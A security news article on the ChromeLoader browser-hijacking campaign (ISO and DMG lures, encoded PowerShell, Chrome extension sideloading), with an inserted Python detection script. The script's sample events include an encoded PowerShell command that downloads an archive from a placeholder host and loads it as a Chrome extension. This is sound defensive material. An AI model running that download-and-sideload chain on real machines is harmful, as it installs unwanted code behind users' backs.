Aedan Russell of Red Canary reports a sudden and unforeseen surge in browser hijacking campaigns driven by the ChromeLoader malware.
The malvertising campaign is financially motivated: the attackers belong to a larger network of marketing affiliates and redirect users to advertising sites.
ChromeLoader is a malicious Chrome browser extension distributed as ISO files through pay-per-install sites and fraudulent social media posts that offer QR codes, pirated movies, or pirated video games.
ChromeLoader modifies browser settings to display search results that steer users toward unwanted software downloads, adult dating sites, gaming platforms, and fake surveys. It stands out from other browser hijackers through its persistence, its infection pathway, and its heavy abuse of PowerShell.
According to the Red Canary blog, the malware operators use a malicious ISO file to get onto the system. The file is presented as a cracked executable for commercial software or video games so that victims download it from malicious sites or torrents. The operators also use Twitter posts to advertise the malicious executable.
When a user double-clicks the ISO on Windows 10 or later, it is mounted as a virtual CD-ROM drive. The executable inside, named CS_Installer.exe, poses as a keygen or game crack but actually launches the malware.
ChromeLoader then executes and decodes a PowerShell command that retrieves a file from a remote server and loads it into the browser as a Chrome extension. Finally, PowerShell removes the scheduled task, leaving Chrome infected with a silently injected extension that hijacks the browser and manipulates search results.
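The Windows chain described above (an executable run from a mounted ISO, an encoded PowerShell command that downloads a payload and loads it as an extension, a scheduled task that is later deleted, and Chrome started with a sideloaded extension) leaves several traces in process-creation telemetry. The script below is an added detection example, not code from the article or from Red Canary: it decodes `-EncodedCommand` payloads and applies a few rules over constructed, Sysmon-style process events. Field names, paths, the hypothetical `example.invalid` host and the sample command lines are all assumptions made up for the example.

```python
import base64
import re

# Flag forms PowerShell accepts for an encoded command (-e, -ec, -en, -enc, -EncodedCommand).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
DOWNLOAD = re.compile(r"(?i)invoke-webrequest|downloadstring|downloadfile|net\.webclient|\biwr\b")
EXT_LOAD = re.compile(r"(?i)--load-extension")
SCHTASKS = re.compile(r"(?i)schtasks(?:\.exe)?\s+/(?:create|delete)")
USER_WRITABLE = re.compile(r"(?i)\\(?:temp|appdata|public|downloads)\\")


def _enc(script):
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry), shaped like flattened Sysmon Event ID 1 records.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 412, "image": r"D:\CS_Installer.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"D:\CS_Installer.exe"},                      # executable from the mounted ISO
    {"pid": 520, "image": PS, "parent": r"D:\CS_Installer.exe",
     "cmdline": "powershell.exe -w hidden -enc " + _enc(
         "Invoke-WebRequest -Uri https://example.invalid/ext.zip -OutFile $env:TEMP\\ext.zip; "
         "Expand-Archive $env:TEMP\\ext.zip $env:TEMP\\ext; "
         "Start-Process chrome.exe --load-extension=$env:TEMP\\ext")},
    {"pid": 533, "image": r"C:\Windows\System32\schtasks.exe", "parent": PS,
     "cmdline": 'schtasks.exe /delete /tn "ChromeTask" /f'},  # task cleaned up by PowerShell
    {"pid": 610, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "parent": PS,
     "cmdline": r'"chrome.exe" --load-extension=C:\Users\bob\AppData\Local\Temp\ext'},
    {"pid": 700, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -Command Get-Date"},          # benign control case
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Apply the detection rules to one process-creation event; return the rule names that fired."""
    findings = []
    name = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    if name == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("powershell_encoded_command")
            # The ChromeLoader pattern: download something, then sideload it into Chrome.
            if DOWNLOAD.search(decoded) and EXT_LOAD.search(decoded):
                findings.append("encoded_download_then_load_extension")
    if SCHTASKS.search(cmd) and "powershell" in event["parent"].lower():
        findings.append("schtasks_from_powershell")
    if name == "chrome.exe" and EXT_LOAD.search(cmd) and USER_WRITABLE.search(cmd):
        findings.append("chrome_load_extension_from_user_writable_path")
    return findings


def scan(events):
    """Map pid -> fired rules for every event that triggered at least one rule."""
    results = {}
    for event in events:
        findings = evaluate(event)
        if findings:
            results[event["pid"]] = findings
    return results


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The rules are deliberately narrow: a lone encoded command is common in administration scripts, so the higher-confidence signal is the combination of a download cmdlet and `--load-extension` inside the decoded script, and a chrome.exe launch whose extension directory sits under a user-writable path. Correlating these by parent process, as the `parent` field does here, is what turns three ordinary events into the chain the article describes.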
Red Canary researchers have also found that ChromeLoader operators target macOS systems to manipulate the Safari and Chrome browsers. The infection chain on macOS is similar, but the attackers use an Apple Disk Image (DMG) file instead of an ISO.
On macOS, the installer executable uses a bash script to download and decompress the malicious extension into the private/var/tmp directory.
HACKREAD is a news platform that focuses on InfoSec, cybercrime, privacy, surveillance, and hacking, with comprehensive reviews of social media platforms and technology trends. Founded in 2011, HackRead is located in the UK.